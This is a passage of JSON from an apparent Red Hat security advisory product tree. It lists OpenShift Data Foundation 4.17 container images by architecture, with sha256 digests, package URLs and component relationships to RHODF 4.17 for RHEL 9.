"purl": "pkg:oci/odf-multicluster-rhel9-operator@sha256:0810e85e929ad83a8593eab74a312b9c49ec94ea9833a37b7f06bca87ca9647b?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odf-multicluster-rhel9-operator\u0026tag=v4.17.0-17"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"product": {
"name": "odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"product_id": "odf4/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odf-must-gather-rhel9@sha256:6978d438b80f8fd7572c792155c2f86cc6fa55ff0b8cb1d45bbe04e42d185fe3?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odf-must-gather-rhel9\u0026tag=v4.17.0-14"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"product": {
"name": "odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"product_id": "odf4/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odf-operator-bundle@sha256:f8e5b7818849a95ca57347496baa35507ce634c645643303205309f55572db7d?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odf-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"product": {
"name": "odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"product_id": "odf4/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odf-rhel9-operator@sha256:70ff7d9b8f6fb97fbe72768ed97519cd9e2b60dedbe1133d17fd0e317079ab3f?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odf-rhel9-operator\u0026tag=v4.17.0-20"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"product": {
"name": "odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"product_id": "odf4/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odf-prometheus-operator-bundle@sha256:75a85b98bcfa527709b8b1f16694a8bf68d5ea84a66b73baf5fea927df6e2904?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odf-prometheus-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"product": {
"name": "odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"product_id": "odf4/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odr-cluster-operator-bundle@sha256:1e2ebbe9f71a03bfc6a0bd90f786293d9eec473ba2d570c8662a7f8d03dcc1b4?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odr-cluster-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"product": {
"name": "odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"product_id": "odf4/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odr-hub-operator-bundle@sha256:22c88c1f6be208bc0a5f0053f99ea728b9e457e150b4236a04304810270f1f80?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odr-hub-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"product": {
"name": "odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"product_id": "odf4/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odr-rhel9-operator@sha256:fc251ea3c441bd0d3e358969fb6730bb9e53e340da9eff8bb6a173a37116c943?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odr-rhel9-operator\u0026tag=v4.17.0-40"
}
}
},
{
"category": "product_version",
"name": "odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"product": {
"name": "odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"product_id": "odf4/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/odr-recipe-operator-bundle@sha256:137a8a07adae2c0bb5fd1ac2a5823ffd85abe1035512a04e112e55b0aa3dc163?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/odr-recipe-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"product": {
"name": "odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"product_id": "odf4/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/rook-ceph-operator-bundle@sha256:7cb791603d9d7c8c1c8e5200f96401ad0fadc5db14ad698e7a9519d046d0fdd0?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/rook-ceph-operator-bundle\u0026tag=v4.17.0-126"
}
}
},
{
"category": "product_version",
"name": "odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"product": {
"name": "odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"product_id": "odf4/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/rook-ceph-rhel9-operator@sha256:b89943771e55457bd3765efd5f3e6e6697953ee9e5c7bd123921a274b79536d3?arch=ppc64le\u0026repository_url=registry.redhat.io/odf4/rook-ceph-rhel9-operator\u0026tag=v4.17.0-51"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
},
{
"branches": [
{
"category": "product_version",
"name": "odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"product": {
"name": "odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"product_id": "odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"product_identification_helper": {
"purl": "pkg:oci/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2?arch=arm64\u0026repository_url=registry.redhat.io/odf4/cephcsi-rhel9-operator\u0026tag=v4.17.0-15"
}
}
},
{
"category": "product_version",
"name": "odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"product": {
"name": "odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"product_id": "odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"product_identification_helper": {
"purl": "pkg:oci/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb?arch=arm64\u0026repository_url=registry.redhat.io/odf4/mcg-core-rhel9\u0026tag=v4.17.0-69"
}
}
},
{
"category": "product_version",
"name": "odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"product": {
"name": "odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"product_id": "odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"product_identification_helper": {
"purl": "pkg:oci/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505?arch=arm64\u0026repository_url=registry.redhat.io/odf4/mcg-rhel9-operator\u0026tag=v4.17.0-23"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"product": {
"name": "odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"product_id": "odf4/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d_arm64",
"product_identification_helper": {
"purl": "pkg:oci/ocs-client-rhel9-operator@sha256:8dbdc5fb2b8d4551e5896f65654b3dae8a5164c12b1e1ec6d7fdda348a7b8c7d?arch=arm64\u0026repository_url=registry.redhat.io/odf4/ocs-client-rhel9-operator\u0026tag=v4.17.0-31"
}
}
},
{
"category": "product_version",
"name": "odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"product": {
"name": "odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"product_id": "odf4/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be_arm64",
"product_identification_helper": {
"purl": "pkg:oci/ocs-rhel9-operator@sha256:54828ef99fc8d8fa3801c2ea0338a56f382018e4ae1a800dcd328fe43f7149be?arch=arm64\u0026repository_url=registry.redhat.io/odf4/ocs-rhel9-operator\u0026tag=v4.17.0-60"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"product": {
"name": "odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"product_id": "odf4/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0_arm64",
"product_identification_helper": {
"purl": "pkg:oci/odf-cli-rhel9@sha256:a42d48b82e34f1f7cb731c3bdd25e81dc5ff3a61a3ca0b8b5eecefb5e2218be0?arch=arm64\u0026repository_url=registry.redhat.io/odf4/odf-cli-rhel9\u0026tag=v4.17.0-29"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"product": {
"name": "odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"product_id": "odf4/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319_arm64",
"product_identification_helper": {
"purl": "pkg:oci/odf-csi-addons-rhel9-operator@sha256:a0ac08a8a3ee9155338182d47bf55595a78aec3811c70f3fedb2ed461aad3319?arch=arm64\u0026repository_url=registry.redhat.io/odf4/odf-csi-addons-rhel9-operator\u0026tag=v4.17.0-30"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"product": {
"name": "odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"product_id": "odf4/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2_arm64",
"product_identification_helper": {
"purl": "pkg:oci/odf-csi-addons-sidecar-rhel9@sha256:6e44cf5a814ceb7fea6ef925f6381a279837ebe2baf2980f4937e0c752afa5e2?arch=arm64\u0026repository_url=registry.redhat.io/odf4/odf-csi-addons-sidecar-rhel9\u0026tag=v4.17.0-30"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"product": {
"name": "odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"product_id": "odf4/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c_arm64",
"product_identification_helper": {
"purl": "pkg:oci/odf-multicluster-rhel9-operator@sha256:54cec6c71192cc9cb6c2bbcd812a5dcccd4905d5d7e822b4012622bb235fe75c?arch=arm64\u0026repository_url=registry.redhat.io/odf4/odf-multicluster-rhel9-operator\u0026tag=v4.17.0-17"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"product": {
"name": "odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"product_id": "odf4/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db_arm64",
"product_identification_helper": {
"purl": "pkg:oci/odf-must-gather-rhel9@sha256:d0a1a2f77001e06cdb650b857433d6eebeb53eb5337354c8a042003db80387db?arch=arm64\u0026repository_url=registry.redhat.io/odf4/odf-must-gather-rhel9\u0026tag=v4.17.0-14"
}
}
},
{
"category": "product_version",
"name": "odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"product": {
"name": "odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"product_id": "odf4/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97_arm64",
"product_identification_helper": {
"purl": "pkg:oci/odf-rhel9-operator@sha256:f94cd1be8e371e8c85062be3e4475157cb628d339c1716bf96167e02703edf97?arch=arm64\u0026repository_url=registry.redhat.io/odf4/odf-rhel9-operator\u0026tag=v4.17.0-20"
}
}
},
{
"category": "product_version",
"name": "odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"product": {
"name": "odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"product_id": "odf4/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae_arm64",
"product_identification_helper": {
"purl": "pkg:oci/odr-rhel9-operator@sha256:bf140f64657478a7f94bacd6784f7b7727d5df9ae8eb4c526f86d5533bff06ae?arch=arm64\u0026repository_url=registry.redhat.io/odf4/odr-rhel9-operator\u0026tag=v4.17.0-40"
}
}
}
],
"category": "architecture",
"name": "arm64"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le"
},
"product_reference": "odf4/cephcsi-operator-bundle@sha256:2b9e511b21d4fefe8450f014962f2450db3e64af07f5e6e4bbfdaafafdfdc1f4_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64"
},
"product_reference": "odf4/cephcsi-operator-bundle@sha256:9a822fddffde8f67711c5025a89e003341011e0b8145cfd5b840849cabbe68a0_amd64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x"
},
"product_reference": "odf4/cephcsi-operator-bundle@sha256:e35426de9ea6419f4981d8c6861867fc3eadcde4e41757b9a8f1ed4f2fa00dc9_s390x",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64"
},
"product_reference": "odf4/cephcsi-rhel9-operator@sha256:78656a47235af49c9a7bc75d9729987edf39a77077a3f478f5b46658df18878a_amd64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le"
},
"product_reference": "odf4/cephcsi-rhel9-operator@sha256:92544e943e160d8fce1a9710a9d67ca4ccb795ff846edf7717d1e52835899202_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x"
},
"product_reference": "odf4/cephcsi-rhel9-operator@sha256:9615793800efca765c5ae588e0547e4e18bdfe264c8a92303fbbc39276c74580_s390x",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64"
},
"product_reference": "odf4/cephcsi-rhel9-operator@sha256:d6e30344ec1d541b6791b0e58cb48f4f3f492069ff8392005e8d1f16350c80e2_arm64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64"
},
"product_reference": "odf4/cephcsi-rhel9@sha256:7bc24afafec3a0896c887d7eeeca47eb6f0cb12e35c62aa212ce55210cb1512d_amd64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le"
},
"product_reference": "odf4/cephcsi-rhel9@sha256:93b238c24a3623bd635e162caa9a30ad7158db25eb83b545e9b365db0f769161_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x"
},
"product_reference": "odf4/cephcsi-rhel9@sha256:fb6507b95b53b19d90b82c3ac2a3b0264ebbdb9d4a8ceff3006e8a446a1cef49_s390x",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64"
},
"product_reference": "odf4/mcg-core-rhel9@sha256:22b568f083c7563ffbb8d23807837a0f78cedeb156cffe9110906f3b6e0c70fb_arm64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le"
},
"product_reference": "odf4/mcg-core-rhel9@sha256:50f66564131a5b2b695582956c80515d7eea64d1c009479665937c97a76e2348_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64"
},
"product_reference": "odf4/mcg-core-rhel9@sha256:a27c28ecf714cc248323a35eb58daec2aa611a318f0e61eb0defe0eaa80eb2f4_amd64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x"
},
"product_reference": "odf4/mcg-core-rhel9@sha256:bee14d945af0620ad1666e67be750324a1814cbf573256c1c88521e18f9877f7_s390x",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64"
},
"product_reference": "odf4/mcg-operator-bundle@sha256:71b79ea2f0356740a0e53e89a0422f8da608dd43337dd07dfcbadc9f9d8a8884_amd64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x"
},
"product_reference": "odf4/mcg-operator-bundle@sha256:729fdaad48dfca53af4b3bf9bbf3cbf9dd25d5c50ddcbac03d0e8738aeb997cc_s390x",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le"
},
"product_reference": "odf4/mcg-operator-bundle@sha256:ed0d44fd0215cd299b4929617fa1f05ea31c6ee3cc078fbf6cc884e02a59beee_ppc64le",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64"
},
"product_reference": "odf4/mcg-rhel9-operator@sha256:1d189e8c4dfcc998d5887e1c5f06e874fa0beed29bc8f87f279299d58124a505_arm64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64 as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64"
},
"product_reference": "odf4/mcg-rhel9-operator@sha256:5f92812a17a6637280387a3033865d8bd13ee8d6506f8e17489cefb79c53f58e_amd64",
"relates_to_product_reference": "9Base-RHODF-4.17"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le as a component of RHODF 4.17 for RHEL 9",
"product_id": "9Base-RHODF-4.17:odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le"
},
"product_reference": "odf4/mcg-rhel9-operator@sha256:7eba9da5ba5071b411bc99d33eee04e3f4530516ad984524920de542629e9b55_ppc64le",
